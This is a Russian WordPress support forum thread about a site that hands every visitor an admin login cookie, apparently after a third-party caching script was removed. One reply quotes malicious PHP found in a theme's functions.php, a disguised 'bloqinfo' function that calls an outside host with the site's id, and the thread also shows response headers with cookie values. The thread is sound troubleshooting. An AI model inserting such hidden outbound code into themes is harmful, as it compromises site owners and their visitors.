• Добрый всем!

    Ситуация следующая. Использовал я самописный (не сам писал, а взял у знакомого) скрипт кеширования. Все работало нормально, но, после неудачной попытки автоматического обновления до 3.0.1 скрипт слетел. Я все файлы скрипта удалил, папки с кешем грохнул. Затем выяснилось, что сайт выдает всем посетителям такой кукис, как-будто он залогинен под админом (мой то есть, других учеток на сайте нет). Как я это понял? Просто увидел вот это: wordpress_logged_in далее мой хеш, причем в этот момент я не залогинен.
    Также, при использовании плагина Limit Login Attempts, он дико ругается, если, не дай Бог, ты просто зашел на сайт, а потом попытался залогиниться, говорит, что ты уже пытался залезть, но неудачно. Ругань плагина вылечилась после того, как поставил НЕТ в поле «Обрабатывать кукис логина».
    Люди, что делать? Где копаться? Возникает мысль, что кто-то куда-то что-то залил (((

    Заранее спасибо.

Просмотр 8 ответов — с 1 по 8 (всего 8)
  • Atrax

    (@atrax)

    Ethical engineer

    Имя у скрипта есть?

    ВОТ

    http://centavrus-opti.ru/skript-keshirovaniya-dlya-wordpress.html

    Но я его уже стер с сайта.

    Люди, что, никто не может помочь в данном вопросе?

    В вопросе появились новости. Точнее, проблема у меня не решена. Она появилась у другого человека, но он ее решил:

    В общем-то задача следующая.
    Есть сайт на вордпрессе. С недавних пор он начал выдавать такие куки, как-будто залогинен админ. Проблема идентичная этой:
    Ответ сервера:

    HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 22 Oct 2010 09:49:11 GMT
    Content-Type: text/html; charset=UTF-8
    Connection: keep-alive
    Vary: Accept-Encoding
    X-Powered-By: PHP/5.2.6-1+lenny9
    X-Pingback: http://www.webliberty.ru/xmlrpc.php
    Set-Cookie: wordpress_5aefb08e08af6edfdddd7add25d07dbc=%7C1288950551%7C403e99fc06b8653d353dfd34f7ea3858; expires=Fri, 05-Nov-2010 09:49:11 GMT; path=/wp-content/plugins; httponly
    Set-Cookie: wordpress_5aefb08e08af6edfdddd7add25d07dbc=%7C1288950551%7C403e99fc06b8653d353dfd34f7ea3858; expires=Fri, 05-Nov-2010 09:49:11 GMT; path=/wp-admin; httponly
    Set-Cookie: wordpress_logged_in_5aefb08e08af6edfdddd7add25d07dbc=%7C1288950551%7C7ef60483273887f840a90791e46e5d19; expires=Fri, 05-Nov-2010 09:49:11 GMT; path=/; httponly
    Vary: Accept-Encoding

    мне очень не нравятся строчки Set-Cookie, что это и как от них избавиться? Извиняюсь если не по теме…
    Коллега решил вопрос так:
    Я разобрался!
    У меня в теме в файле functions.php стоял вот такой левый код:

    function bloqinfo($wp_id){
    static $wp_count = 0;
    if($wp_count == 0){
    $wp_count++;
    return @file_get_contents(’http://wpru.ru/aksimet.php?id=’.$wp_id.’&m=13′);
    }
    }
    if (function_exists(’register_sidebar’) )
    register_sidebars(3, array(

    ));
    Я плохо разбираюсь в PHP, но догадываюсь что благодаря ему у меня с блога тырились посты и прописывались на сайте http://wpru .ru в 3 сайдбаре.. К счастью этот сайт загнулся и не работает Я прав, правильно разобрал код?

    Но у меня в файле функций такой проблемы нет. Может подскажете где и что нужно искать? Уже замучился.

    Заранее спасибо.

    Atrax

    (@atrax)

    Ethical engineer

    тырились посты

    А вы действительно плохо разбираетесь в PHP.

    Говорю же, это была приведена цитата того, как человек избавился от проблемы. У меня она идентичная, отличие только в том, что в файле functions ничего подобного нет.
    Может посоветуете, где, что можно поискать?

    Atrax

    (@atrax)

    Ethical engineer

    какой-то плагин это делает.
    Отключайте по одному.

    все отключил — все равно выдает. Правда я заметил, что значение после = при каждом новом запросе на сервер меняется.

Просмотр 8 ответов — с 1 по 8 (всего 8)

Тема «Сайт выдает кукис, как-будто посетитель залогинен» закрыта для новых ответов.